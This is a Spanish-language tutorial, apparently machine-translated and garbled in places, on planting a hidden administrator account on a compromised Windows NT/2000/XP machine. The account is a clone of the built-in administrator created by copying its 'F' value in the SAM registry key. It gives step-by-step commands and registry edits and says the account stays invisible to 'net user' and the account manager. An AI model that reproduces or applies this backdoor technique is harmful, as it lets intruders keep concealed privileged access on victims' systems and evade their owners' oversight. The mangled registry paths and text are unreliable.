Crear un superusuario oculto para Windows

Creo que todos están familiarizados con regedit.exe, pero no puedo establecer permisos en la clave de registro. La mayor ventaja de regedt32.exe es la capacidad de establecer permisos en la clave de registro. La información de la cuenta de nt /2000 /xp se encuentra bajo la clave HKEY_LOCAL_MACHINESAMSAM del registro, pero excepto por el SISTEMA del usuario del sistema, otros usuarios no tienen derecho a ver la información interna, por lo que primero uso el regedt32.exe para configurar la clave SAM para mí Control total y permisos. Esto leerá y escribirá la información en la clave SAM. Los pasos específicos son los siguientes:

1. Supongamos que iniciamos sesión en el broiler con el servicio de terminal como administrador de superusuario. Primero cree una cuenta en la línea de comandos o en el administrador de cuentas: hacker $, aquí Cree esta cuenta bajo la línea de comando hacker del usuario neto $ 1234 /add

2. En el inicio /ejecución, escriba: regedt32.exe y presione Entrar para ejecutar regedt32.exe.

3, el punto " permisos " abrirá el punto de la ventana para agregar la cuenta cuando inicie sesión en la barra de seguridad, aquí estoy registrado como administrador, por lo que agregaré administrador, y Establezca los permisos en " Control total ". Aquí debe explicar: es mejor agregar la cuenta en la que inició sesión o el grupo donde se ubica la cuenta, y no modificar la cuenta o el grupo original, de lo contrario, se presentarán una serie de problemas innecesarios. Si oculta al superusuario, puede eliminar la cuenta que agregó aquí.

4, luego haga clic en " Inicio " → " Ejecutar " e ingrese " regedit.exe " Intro para iniciar el editor de registro regedit.exe. Abra la clave: HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker $ "

5. Exporte los elementos hacker $, 00000409 y 000001F4 a hacker.reg, 409.reg, 1f4.reg, y edite estos archivos exportados con Notepad. Copie el valor de la clave "F" debajo del elemento 000001F4 del superusuario y anule el valor de la clave "F" debajo del elemento 00000409 del hacker $, y luego combine 00000409.reg con el hacker.reg.

6. Ejecute net user hacker $ /del en la línea de comandos para eliminar hacker $: net user hacker $ /del

7. Presione F5 para actualizar en la ventana regedit.exe. Luego escriba el archivo: importe el archivo de registro e importe el hacker.reg modificado en el registro.

8. En este punto, se construyó el superusuario oculto $ hacker, y luego se cierra regedit.exe. En la ventana regedt32.exe, cambie el permiso de la clave HKEY_LOCAL_MACHINESAMSAM de nuevo al estado original (solo elimine el administrador de cuenta agregado).

9, Nota: Después de que se construye el superusuario oculto, el usuario en el administrador de cuentas no puede ver al hacker $, y la línea de comandos no se puede ver con el comando "net user", pero después de que se establece el superusuario, , no puede volver a cambiar la contraseña, si usa el comando net user para cambiar la contraseña del hacker $, el superusuario oculto será visto en el administrador de cuentas y no podrá eliminarse.